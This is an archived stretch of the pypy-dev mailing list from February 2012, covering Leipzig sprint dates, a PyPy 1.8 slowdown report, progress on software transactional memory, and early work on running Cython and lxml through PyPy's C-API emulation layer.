<4F3E561D.2080307@gmail.com> Message-ID: Hi Antoni, On Fri, Feb 17, 2012 at 15:51, Antoni Segura Puimedon wrote: > I saw that there will be a sprint soon in Berlin (and it not being that far > from Prague, if the dates allow, it might be possible for me to take some > vacation days and assist). You are most welcome to our sprints. No previous experience is needed, although as you say, it's useful if you have previously read about or done something about some part of PyPy; or at least have good Python knowledge. We are planning so far to have a sprint not in Berlin (unless I missed this one), but in Leipzig, Germany, near the end of June. A bient?t, Armin. From celebdor at gmail.com Fri Feb 17 18:49:44 2012 From: celebdor at gmail.com (Antoni Segura Puimedon) Date: Fri, 17 Feb 2012 18:49:44 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: Hi Armin, Thanks a lot for welcoming me to the sprint. Leipzig sounds even better for coming from Prague. In the end of June I am organizing a biggish LAN party near Barcelona, so I don't know if I will be able to come, but if there is a chance I will surely come. Any suggestion on where to start reading pypy code/material? Antoni Segura Puimedon PS: I'm curious about the regularity and the location choice of the PyPy team, how does it usually work? On Fri, Feb 17, 2012 at 6:38 PM, Armin Rigo wrote: > Hi Antoni, > > On Fri, Feb 17, 2012 at 15:51, Antoni Segura Puimedon > wrote: > > I saw that there will be a sprint soon in Berlin (and it not being that > far > > from Prague, if the dates allow, it might be possible for me to take some > > vacation days and assist). > > You are most welcome to our sprints. No previous experience is > needed, although as you say, it's useful if you have previously read > about or done something about some part of PyPy; or at least have good > Python knowledge. > > We are planning so far to have a sprint not in Berlin (unless I missed > this one), but in Leipzig, Germany, near the end of June. > > > A bient?t, > > Armin. > -------------- next part -------------- An HTML attachment was scrubbed... URL: From tbaldridge at gmail.com Fri Feb 17 19:05:27 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 12:05:27 -0600 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: >It's factorial(), so it's handling large "longs". ?So it's about 2x as >slow as CPython. ?End of the story. Funny enough, had just thought of that and given it a try. I switched it to calculating (fact 20) and (times 200000) and PyPy is now 3x faster than CPython. Thanks for the help! Timothy From tbaldridge at gmail.com Fri Feb 17 19:16:47 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 12:16:47 -0600 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: References: <4F3991C8.5040305@u.washington.edu> Message-ID: >> Anyone can either install PyPy from his own distribution, or translate >> it from sources; or attempt to get one of our nightly binary packages, >> which may or may not work because it's Linux. ?I think that this is >> what you get on Linux, and we will not try to find obscure workarounds >> (like making all our nightly binary packages twice as big just for >> this use case). Or you can just do what I did. Find a old package for your linux system and install that. On my Ubuntu box v11.10, I simply found a old openssl-0.9.8o.deb that was meant for version 10.x. The deps on the package stated something like: libc >= 2.4.3 So it just installed and ran fine. PyPy is now happily running on my machine. Timothy From laurentvaucher at gmail.com Fri Feb 17 19:23:15 2012 From: laurentvaucher at gmail.com (Laurent Vaucher) Date: Fri, 17 Feb 2012 19:23:15 +0100 Subject: [pypy-dev] [Repost] PyPy 1.8 50% slower than PyPy 1.7 on my test case Message-ID: Sorry to repost, but does anyone have an idea about what I could do to track down the source of the slowdown? Should I run with some trace to try to compare how different parts behave? How could I do that? Thanks, Laurent. Hi and first of all, thanks for that great project. Now to my "problem". I'm doing some puzzle-solving, constraint processing with Python and on my particular program, PyPy 1.8 showed a 50% increase in running time over PyPy 1.7. I'm not doing anything fancy (no numpy, itertools, etc.). The program is here: https://github.com/slowfrog/hexiom To reproduce: - fetch hexiom2.py and level36.txt from github - run 'pypy hexiom2.py -sfirst level36.txt' On my machine (Windows 7) the timings are the following: Python 2.6.5/Windows 32 3m35s Python 2.7.1 (930f0bc4125a, Nov 27 2011, 11:58:57) [PyPy 1.7.0 with MSC v.1500 32 bit] 31s Python 2.7.2 (0e28b379d8b3, Feb 09 2012, 18:31:47) [PyPy 1.8.0 with MSC v.1500 32 bit] 48s I'm using the default options. Do you have any idea what could be causing that? Thanks, Laurent. -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Fri Feb 17 19:31:47 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 19:31:47 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi all, A negative update regarding HTM: from some sources, we can do the educated guess that Intel's Haswell processor, released in 2013, will have HTM --- at the level of the processor's L1 cache. That means that just a few kilobytes of memory can be part of a transaction's read/write set. Moreover there is no mecanism to tell the cpu "this read/write needs not be tracked", so it has to record everything in these few kilobytes. So, bad news: it's very unlikely to be of any use at all for the large-scale transactions I'm playing with. A bient?t, Armin. From fijall at gmail.com Fri Feb 17 19:38:17 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 20:38:17 +0200 Subject: [pypy-dev] [Repost] PyPy 1.8 50% slower than PyPy 1.7 on my test case In-Reply-To: References: Message-ID: On Fri, Feb 17, 2012 at 8:23 PM, Laurent Vaucher wrote: > > Sorry to repost, but does anyone have an idea about what I could do to track > down the source of the slowdown? Should I run with some trace to try to > compare how different parts behave? How could I do that? > > Thanks, > Laurent. Hi laurent. Good starting points: * run stuff with cProfile and compare * run stuff with valgrind and compare * compare traces * run PYPYLOG=log pypy and then analyze output using pypy/tool/logparser.py I'm sorry we did not get back to you, but we're quite busy. Thanks! fijal > > Hi and first of all, thanks for that great project. > Now to my "problem". I'm doing some puzzle-solving, constraint processing > with Python and on my particular program, PyPy 1.8 showed a 50% increase in > running time over PyPy 1.7. I'm not doing anything fancy (no numpy, > itertools, etc.). > > The program is here: https://github.com/slowfrog/hexiom > To reproduce: > - fetch hexiom2.py and level36.txt from github > - run 'pypy hexiom2.py -sfirst level36.txt' > On my machine (Windows 7) the timings are the following: > > Python 2.6.5/Windows 32 > 3m35s > > Python 2.7.1 (930f0bc4125a, Nov 27 2011, 11:58:57) > [PyPy 1.7.0 with MSC v.1500 32 bit] > 31s > > Python 2.7.2 (0e28b379d8b3, Feb 09 2012, 18:31:47) > [PyPy 1.8.0 with MSC v.1500 32 bit] > 48s > > I'm using the default options. > Do you have any idea what could be causing that? > Thanks, > Laurent. > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > From tbaldridge at gmail.com Fri Feb 17 19:39:24 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 12:39:24 -0600 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: >"this read/write needs not be tracked", so it has to record everything in > these few kilobytes. On that subject, how do I do this in the pypy STM? From what I understand, all read/writes inside a transaction.add() function are tracked, and the entire function is restarted if anything fails. However, there are many times, that I really don't care if some global config variable has been updated, so there's really no use in tracking changes with it. How do we let the STM engine know of this? Timothy From arigo at tunes.org Fri Feb 17 19:47:59 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 19:47:59 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi Timothy, On Fri, Feb 17, 2012 at 19:39, Timothy Baldridge wrote: > On that subject, how do I do this in the pypy STM? You can't. Every change is tracked, at the level of Python. If you don't want to do this, it would require careful language design questions; I'll leave these for later. The reason I'm bringing this forward is that, for example, any Python code typically allocates and forgets tons of objects. We would like to tell the hardware "don't track this, it's a just-allocated object --- so if you roll back the whole transaction, you don't need to restore what was there". But we can't, with the 2013 version of Intel's HTM. This alone means that the hardware would track at least 10 times more memory than really needed. A bient?t, Armin. From arigo at tunes.org Fri Feb 17 19:50:43 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 19:50:43 +0100 Subject: [pypy-dev] [Repost] PyPy 1.8 50% slower than PyPy 1.7 on my test case In-Reply-To: References: Message-ID: Hi Laurent, On Fri, Feb 17, 2012 at 19:23, Laurent Vaucher wrote: > Sorry to repost, but does anyone have an idea about what I could do to track > down the source of the slowdown? We're busy, as Fijal said, but your issue is not forgotten. I have already put it there: https://bugs.pypy.org/issue1051 A bient?t, Armin. From mmueller at python-academy.de Fri Feb 17 20:13:55 2012 From: mmueller at python-academy.de (=?ISO-8859-1?Q?Mike_M=FCller?=) Date: Fri, 17 Feb 2012 20:13:55 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: <4F3D90DD.2010804@gmail.com> References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> Message-ID: <4F3EA6F3.4090606@python-academy.de> Am 17.02.12 00:27, schrieb Antonio Cuni: > On 02/16/2012 10:17 PM, Armin Rigo wrote: >> Hi Mike, >> >> On Thu, Feb 16, 2012 at 22:07, Mike M?ller wrote: >>> We can move the date. One week or only a few days? Like 22nd till 27th >>> of June would put four days in between the sprint and EP. >> >> That would work too. Antonio, would such dates let you come to >> Leipzig for at least most of the sprint, or should we say "too bad" >> for you? > > yes, those dates might work for me. > However, I'd prefer not to do any promise, so if people prefer to do 25-30, > then too bad for me. > > Just pick the period that you prefer, and then if I manage I'll be glad to come. Do you want to run a Doodle on it or are we close enough to an agreement on the dates? ;) So June 22 - 27, 2012 is it or still need to shift? Cheers, Mike From stefan_ml at behnel.de Fri Feb 17 20:16:35 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Fri, 17 Feb 2012 20:16:35 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: <4F3D90DD.2010804@gmail.com> References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> Message-ID: Antonio Cuni, 17.02.2012 00:27: > On 02/16/2012 10:17 PM, Armin Rigo wrote: >> On Thu, Feb 16, 2012 at 22:07, Mike M?ller wrote: >>> We can move the date. One week or only a few days? Like 22nd till 27th >>> of June would put four days in between the sprint and EP. >> >> That would work too. Antonio, would such dates let you come to >> Leipzig for at least most of the sprint, or should we say "too bad" >> for you? > > yes, those dates might work for me. > However, I'd prefer not to do any promise, so if people prefer to do 25-30, > then too bad for me. > > Just pick the period that you prefer, and then if I manage I'll be glad to > come. Just a note that I'll be in Leipzig up to the 15th of June anyway (giving a Cython course). I don't know if the week after that suits *anyone* (including Mike), but if you could move the sprint another week earlier, I'd arrange to stay for the week-end (16/17th) and we could discuss Cython/PyPy integration topics there. Stefan From andrewfr_ice at yahoo.com Fri Feb 17 20:26:19 2012 From: andrewfr_ice at yahoo.com (Andrew Francis) Date: Fri, 17 Feb 2012 11:26:19 -0800 (PST) Subject: [pypy-dev] Questions Re: STM status In-Reply-To: References: Message-ID: <1329506779.17932.YahooMailNeo@web120705.mail.ne1.yahoo.com> Hi Armin: ________________________________ From: Armin Rigo To: PyPy Developer Mailing List Sent: Thursday, February 16, 2012 3:58 PM Subject: [pypy-dev] STM status >An update for STM: today I managed to build a pypy using the new "stm >gc".? It runs richards.py on tannit: >in 1 thread: 2320 ms per iteration >in 2 threads: 1410 ms per iteration >in 4 threads: 785 ms per iteration >in 8 threads: 685 ms per iteration >The small gap between 4 and 8 threads is due to tannit having only 4 >"real" cpus, each one hyperthreaded.? The additional gain is thus >smaller than expected. This is really exciting stuff. As always I have a few questions. 1) I have been looking at the transaction module and its dependent modules. In rstm.perform_transaction, I see a comment to a "custom GIL." So the GIL is still there? Or will it be eventually removed? 2) I have glanced over the transaction and rstm module (it would help if I understood PyPy's architecture better but I am working on that). I figured it would be best to focus on translator.transform.py and translator.llstminterp.py first to understand what is happening at a high level.? I admit I am not comfortable with reading the code. However I see places where the code distinguishes between mutable and immutable, local and non local variables. I will assume mutable and non-local variables will be the subject of transactional memory.? ? Although the STM?implementation?will be transparent to the programmer (there is only transaction.run() and transaction.add() available to the programmer), can I assume that one can "help" the STM if a) somehow more variables can be marked as immutable? 2)"Threads of execution" do not share state. Essentially a more functional programming approach. Or am I reading too much into this? 3) Could the stackless module work with STM? Cheers, Andrew -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Fri Feb 17 20:26:46 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 21:26:46 +0200 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> Message-ID: On Fri, Feb 17, 2012 at 9:16 PM, Stefan Behnel wrote: > Antonio Cuni, 17.02.2012 00:27: >> On 02/16/2012 10:17 PM, Armin Rigo wrote: >>> On Thu, Feb 16, 2012 at 22:07, Mike M?ller wrote: >>>> We can move the date. One week or only a few days? Like 22nd till 27th >>>> of June would put four days in between the sprint and EP. >>> >>> That would work too. ?Antonio, would such dates let you come to >>> Leipzig for at least most of the sprint, or should we say "too bad" >>> for you? >> >> yes, those dates might work for me. >> However, I'd prefer not to do any promise, so if people prefer to do 25-30, >> then too bad for me. >> >> Just pick the period that you prefer, and then if I manage I'll be glad to >> come. > > Just a note that I'll be in Leipzig up to the 15th of June anyway (giving a > Cython course). I don't know if the week after that suits *anyone* > (including Mike), but if you could move the sprint another week earlier, > I'd arrange to stay for the week-end (16/17th) and we could discuss > Cython/PyPy integration topics there. > > Stefan I'm afraid I can't make it that early :( Since my home base is cape town travelling back and forth for 10 days just does not make any sense. 22-27 (being all full sprint days right? we usually do 3 + 1 + 3 including weekends) sounds very good to me. Cheers, fijal From mmueller at python-academy.de Fri Feb 17 21:05:36 2012 From: mmueller at python-academy.de (=?UTF-8?B?TWlrZSBNw7xsbGVy?=) Date: Fri, 17 Feb 2012 21:05:36 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> Message-ID: <4F3EB310.5090208@python-academy.de> Am 17.02.12 20:26, schrieb Maciej Fijalkowski: > On Fri, Feb 17, 2012 at 9:16 PM, Stefan Behnel wrote: >> Antonio Cuni, 17.02.2012 00:27: >>> On 02/16/2012 10:17 PM, Armin Rigo wrote: >>>> On Thu, Feb 16, 2012 at 22:07, Mike M?ller wrote: >>>>> We can move the date. One week or only a few days? Like 22nd till 27th >>>>> of June would put four days in between the sprint and EP. >>>> >>>> That would work too. Antonio, would such dates let you come to >>>> Leipzig for at least most of the sprint, or should we say "too bad" >>>> for you? >>> >>> yes, those dates might work for me. >>> However, I'd prefer not to do any promise, so if people prefer to do 25-30, >>> then too bad for me. >>> >>> Just pick the period that you prefer, and then if I manage I'll be glad to >>> come. >> >> Just a note that I'll be in Leipzig up to the 15th of June anyway (giving a >> Cython course). I don't know if the week after that suits *anyone* >> (including Mike), but if you could move the sprint another week earlier, >> I'd arrange to stay for the week-end (16/17th) and we could discuss >> Cython/PyPy integration topics there. This week is still available. >> >> Stefan > > I'm afraid I can't make it that early :( Since my home base is cape > town travelling back and forth for 10 days just does not make any > sense. > > 22-27 (being all full sprint days right? we usually do 3 + 1 + 3 > including weekends) sounds very good to me. I think the one with the longest traveling distance should get the highest priority, which puts 22-27 into the pole positions. Stefan: How about coming to Leipzig again? I know it is about 5 hours by train (much longer than it needs to be :( ). Train tickets get rather inexpensive when booked well ahead and valid for a specific train only. Well, there is still the extra time. You can also fly from Munich. This could be cheaper than the train. To all: I think we can get some funding to cover (parts) of traveling and accommodation costs if your company/institution does not pay. Mike From arigo at tunes.org Fri Feb 17 21:24:25 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 21:24:25 +0100 Subject: [pypy-dev] Questions Re: STM status In-Reply-To: <1329506779.17932.YahooMailNeo@web120705.mail.ne1.yahoo.com> References: <1329506779.17932.YahooMailNeo@web120705.mail.ne1.yahoo.com> Message-ID: Hi Andrew, On Fri, Feb 17, 2012 at 20:26, Andrew Francis wrote: > 1) I have been looking at the transaction module and its dependent modules. > In rstm.perform_transaction, I see a comment to a "custom GIL." So the GIL > is still there? Or will it be eventually removed? That's for tests. It's protected under "if not we_are_translated()", which means that this code is never translated into the final pypy executable. > I admit I am not comfortable with reading the code. However I see places > where the code distinguishes between mutable and immutable, local and non > local variables. I will assume mutable and non-local variables will be the > subject of transactional memory. Yes, exactly. But note that distinguishing such variables only occurs in RPython, where some fields of some objects are marked as "immutable". It is important because e.g. we don't want to track the reads of the integer value out of the immutable "int" objects. I suspect that it is less important at the level of regular Python, but see below. As for the difference between "local" and "global", it's also visible at RPython level only. If a transaction allocates an object, it is "local". If it reads from an object that existed before, it reads from a "global" object. If it writes to an object that existed before, the global object is first copied as a local object. (The global objects are immutable at this level.) When the transaction commits, we do a local GC and copy the surviving local objects to become globals; then we atomically update the global objects that have been copied and modified. This is, of course, all invisible at the level of Python. > can I assume that one can "help" the STM if a) somehow more > variables can be marked as immutable? This might maybe at some point later be exposed to Python level too, where if you would declare some fields of some Python class as being immutable; then you really couldn't change them but the implementation could improve a bit performance. But that's a language extension, so a bit unlikely to occur. > 2)"Threads of execution" do not share state. > Essentially a more functional programming approach. Well, multiple "threads of execution" do share state, in this programming model. It allows us to not have to completely change everything in the programs we already wrote. :-) > 3) Could the stackless module work with STM? Yes: one transaction would be the time between two switch()es. It would probably just need some integration between the existing modules, 'transaction' and '_continuation'. A bient?t, Armin. From stefan_ml at behnel.de Fri Feb 17 21:40:03 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Fri, 17 Feb 2012 21:40:03 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: <4F3EB310.5090208@python-academy.de> References: <4EFF29FF.7040009@python-academy.de> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> <4F3EB310.5090208@python-academy.de> Message-ID: Mike M?ller, 17.02.2012 21:05: > Am 17.02.12 20:26, schrieb Maciej Fijalkowski: >> On Fri, Feb 17, 2012 at 9:16 PM, Stefan Behnel wrote: >>> Just a note that I'll be in Leipzig up to the 15th of June anyway (giving a >>> Cython course). I don't know if the week after that suits *anyone* >>> (including Mike), but if you could move the sprint another week earlier, >>> I'd arrange to stay for the week-end (16/17th) and we could discuss >>> Cython/PyPy integration topics there. > > This week is still available. > >> I'm afraid I can't make it that early :( Since my home base is cape >> town travelling back and forth for 10 days just does not make any >> sense. >> >> 22-27 (being all full sprint days right? we usually do 3 + 1 + 3 >> including weekends) sounds very good to me. > > I think the one with the longest traveling distance should get the highest > priority, which puts 22-27 into the pole positions. Agreed. > Stefan: How about coming to Leipzig again? I know it is about 5 hours > by train (much longer than it needs to be :( ). Train tickets get rather > inexpensive when booked well ahead and valid for a specific train only. > Well, there is still the extra time. Yes, 5:30 hours for a direct connection is exceedingly long for that distance - Hamburg is about the same time. But if there is serious interest, I'll see if I can make it for the Friday. Stefan From cdash004 at odu.edu Sat Feb 18 03:51:51 2012 From: cdash004 at odu.edu (Chris Dashiell) Date: Fri, 17 Feb 2012 21:51:51 -0500 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi, I just wanted to let you know the numbers I got on a 32 core server. 1 thread: 3280 ms 4 threads: 2665 ms 8 threads: 2976 ms 16 threads: 2878 ms 32 threads: 2714 ms Chris On Thu, Feb 16, 2012 at 3:58 PM, Armin Rigo wrote: > Hi all, > > An update for STM: today I managed to build a pypy using the new "stm > gc". It runs richards.py on tannit: > > in 1 thread: 2320 ms per iteration > in 2 threads: 1410 ms per iteration > in 4 threads: 785 ms per iteration > in 8 threads: 685 ms per iteration > > The small gap between 4 and 8 threads is due to tannit having only 4 > "real" cpus, each one hyperthreaded. The additional gain is thus > smaller than expected. > > For comparison, a "pypy --jit off" runs at 650ms per iteration. So > the single-threaded performance is already at only 3.6x worse, and > moreover there are still a few easy big-win optimizations. I will > confirm it in a few days, but I would say that this shows it's working > quite well. :-) > > At least, it's fun to see in "top" a single pypy process using 397% cpu :-) > > For people interested, it is in the "stm-gc" branch; at least > bba9b03f5e70 works. Linux-only for now: " translate.py -O1 --stm > targetpypystandalone --no-allworkingmodules --withmod-transaction > --withmod-select --withmod-_socket ". The modified version of > richards.py I use is in pypy/translator/stm/test/. > > > A bient?t, > > Armin. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > > > -- > BEGIN-ANTISPAM-VOTING-LINKS > ------------------------------------------------------ > > Teach CanIt if this mail (ID 616300255) is spam: > Spam: > https://www.spamtrap.odu.edu/b.php?i=616300255&m=343fb35e7bff&t=20120216&c=s > Not spam: > https://www.spamtrap.odu.edu/b.php?i=616300255&m=343fb35e7bff&t=20120216&c=n > Forget vote: > https://www.spamtrap.odu.edu/b.php?i=616300255&m=343fb35e7bff&t=20120216&c=f > ------------------------------------------------------ > END-ANTISPAM-VOTING-LINKS > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 09:48:05 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 09:48:05 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Stefan Behnel, 15.02.2012 12:32: > The current state of the discussion seems to be that PyPy provides ways to > talk to C code, but nothing as complete as CPython's C-API in the sense > that it allows efficient two-way communication between C code and Python > objects. Thus, we need to either improve this or look for alternatives. > > In order to get us more focussed on what can be done and what the > implications are, so that we may eventually be able to decide what should > be done, I started a Wiki page for a PyPy backend CEP (Cython Enhancement > Proposal). > > http://wiki.cython.org/enhancements/pypy The discussion so far makes me rather certain that the most promising short-term solution is to make Cython generate C code that PyPy's cpyext can handle. This should get us a rather broad set of running code somewhat quickly, while requiring the least design-from-scratch type of work in a direction that does not yet allow us to see if it will really make existing code work or not. On top of the basic cpyext interface, it should then be easy to implement obvious optimisations like native C level calls to Cython wrapped functions from PyPy (and potentially also the other direction) and otherwise avoid boxing/unboxing where unnecessary, e.g. for builtins. After all, it all boils down to native code at some point and I'm sure there are various ways to exploit that. Also, going this route will help both projects to get to know each other better. I think that's a required basis if we really aim for designing a more high-level interface at some point. The first steps I see are: - get Cython's test suite to run on PyPy - analyse the failing tests and decide how to fix them - adapt the Cython generated C code accordingly, special casing for PyPy where required Here is a "getting started" guide that tells you how testing works in Cython: http://wiki.cython.org/HackerGuide Once we have the test suite runnable, we can set up a PyPy instance on our CI server to get feed-back on any advances. https://sage.math.washington.edu:8091/hudson/ So, any volunteers or otherwise interested parties to help in getting this to work? Anyone in for financial support? Stefan From amauryfa at gmail.com Sat Feb 18 10:08:12 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 10:08:12 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Hi, 2012/2/18 Stefan Behnel > Stefan Behnel, 15.02.2012 12:32: > > The current state of the discussion seems to be that PyPy provides ways > to > > talk to C code, but nothing as complete as CPython's C-API in the sense > > that it allows efficient two-way communication between C code and Python > > objects. Thus, we need to either improve this or look for alternatives. > > > > In order to get us more focussed on what can be done and what the > > implications are, so that we may eventually be able to decide what should > > be done, I started a Wiki page for a PyPy backend CEP (Cython Enhancement > > Proposal). > > > > http://wiki.cython.org/enhancements/pypy > > The discussion so far makes me rather certain that the most promising > short-term solution is to make Cython generate C code that PyPy's cpyext > can handle. This should get us a rather broad set of running code somewhat > quickly, while requiring the least design-from-scratch type of work in a > direction that does not yet allow us to see if it will really make existing > code work or not. > > On top of the basic cpyext interface, it should then be easy to implement > obvious optimisations like native C level calls to Cython wrapped functions > from PyPy (and potentially also the other direction) and otherwise avoid > boxing/unboxing where unnecessary, e.g. for builtins. After all, it all > boils down to native code at some point and I'm sure there are various ways > to exploit that. > > Also, going this route will help both projects to get to know each other > better. I think that's a required basis if we really aim for designing a > more high-level interface at some point. > > The first steps I see are: > > - get Cython's test suite to run on PyPy > - analyse the failing tests and decide how to fix them > - adapt the Cython generated C code accordingly, special casing for PyPy > where required > > Here is a "getting started" guide that tells you how testing works in > Cython: > > http://wiki.cython.org/HackerGuide > > Once we have the test suite runnable, we can set up a PyPy instance on our > CI server to get feed-back on any advances. > > https://sage.math.washington.edu:8091/hudson/ > > So, any volunteers or otherwise interested parties to help in getting this > to work? Anyone in for financial support? Actually I spent several evenings on this. I made some modifications to pypy, cython and lxml, and now I can compile and install cython, lxml, and they seem to work! For example:: html = etree.Element("html") body = etree.SubElement(html, "body") body.text = "TEXT" br = etree.SubElement(body, "br") br.tail = "TAIL" html.xpath("//text()") Here are the changes I made, some parts are really hacks and should be polished: lxml: http://paste.pocoo.org/show/552903/ cython: http://paste.pocoo.org/show/552904/ pypy changes are already submitted. As expected, the example above is much slower on pypy, about 15x slower than with cpython2.6. And I still get crashes when running the lxml test suite. But the situation looks much better than before, support of all lxml features seems possible. Cheers, -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 10:27:51 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 10:27:51 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 10:08: > 2012/2/18 Stefan Behnel >> Stefan Behnel, 15.02.2012 12:32: >>> http://wiki.cython.org/enhancements/pypy >> >> So, any volunteers or otherwise interested parties to help in getting this >> to work? Anyone in for financial support? > > Actually I spent several evenings on this. > I made some modifications to pypy, cython and lxml, > and now I can compile and install cython, lxml, and they seem to work! > > For example:: > html = etree.Element("html") > body = etree.SubElement(html, "body") > body.text = "TEXT" > br = etree.SubElement(body, "br") > br.tail = "TAIL" > html.xpath("//text()") > > Here are the changes I made, some parts are really hacks and should be > polished: > lxml: http://paste.pocoo.org/show/552903/ > cython: http://paste.pocoo.org/show/552904/ > pypy changes are already submitted. Cool. Most of the changes look reasonable at first glance. I'll see what I can apply on my side. We may get at least some of this into Cython 0.16 (which is close to release). > As expected, the example above is much slower on pypy, about 15x slower > than with cpython2.6. Given that XML processing is currently slower in PyPy than in CPython, I don't think that's all that bad. Users can still switch their imports to ElementTree if they only want to push XML out and I imagine that lxml would still be at least as fast as ElementTree under PyPy for the way in. > And I still get crashes when running the lxml test suite. I can imagine. ;) > But the situation looks much better than before, support of all lxml > features seems possible. I think that's what matters to most users who want to do XML processing in PyPy. Stefan From fijall at gmail.com Sat Feb 18 10:35:24 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Sat, 18 Feb 2012 11:35:24 +0200 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: On Sat, Feb 18, 2012 at 11:27 AM, Stefan Behnel wrote: > Amaury Forgeot d'Arc, 18.02.2012 10:08: >> 2012/2/18 Stefan Behnel >>> Stefan Behnel, 15.02.2012 12:32: >>>> http://wiki.cython.org/enhancements/pypy >>> >>> So, any volunteers or otherwise interested parties to help in getting this >>> to work? Anyone in for financial support? >> >> Actually I spent several evenings on this. >> I made some modifications to pypy, cython and lxml, >> and now I can compile and install cython, lxml, and they seem to work! >> >> For example:: >> ? ? html = etree.Element("html") >> ? ? body = etree.SubElement(html, "body") >> ? ? body.text = "TEXT" >> ? ? br = etree.SubElement(body, "br") >> ? ? br.tail = "TAIL" >> ? ? html.xpath("//text()") >> >> Here are the changes I made, some parts are really hacks and should be >> polished: >> lxml: http://paste.pocoo.org/show/552903/ >> cython: http://paste.pocoo.org/show/552904/ >> pypy changes are already submitted. > > Cool. Most of the changes look reasonable at first glance. I'll see what I > can apply on my side. We may get at least some of this into Cython 0.16 > (which is close to release). > > >> As expected, the example above is much slower on pypy, about 15x slower >> than with cpython2.6. > > Given that XML processing is currently slower in PyPy than in CPython, I > don't think that's all that bad. Users can still switch their imports to > ElementTree if they only want to push XML out and I imagine that lxml would > still be at least as fast as ElementTree under PyPy for the way in. > Are you sure actually? From stefan_ml at behnel.de Sat Feb 18 10:48:26 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 10:48:26 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Maciej Fijalkowski, 18.02.2012 10:35: > On Sat, Feb 18, 2012 at 11:27 AM, Stefan Behnel wrote: >> Given that XML processing is currently slower in PyPy than in CPython, I >> don't think that's all that bad. Users can still switch their imports to >> 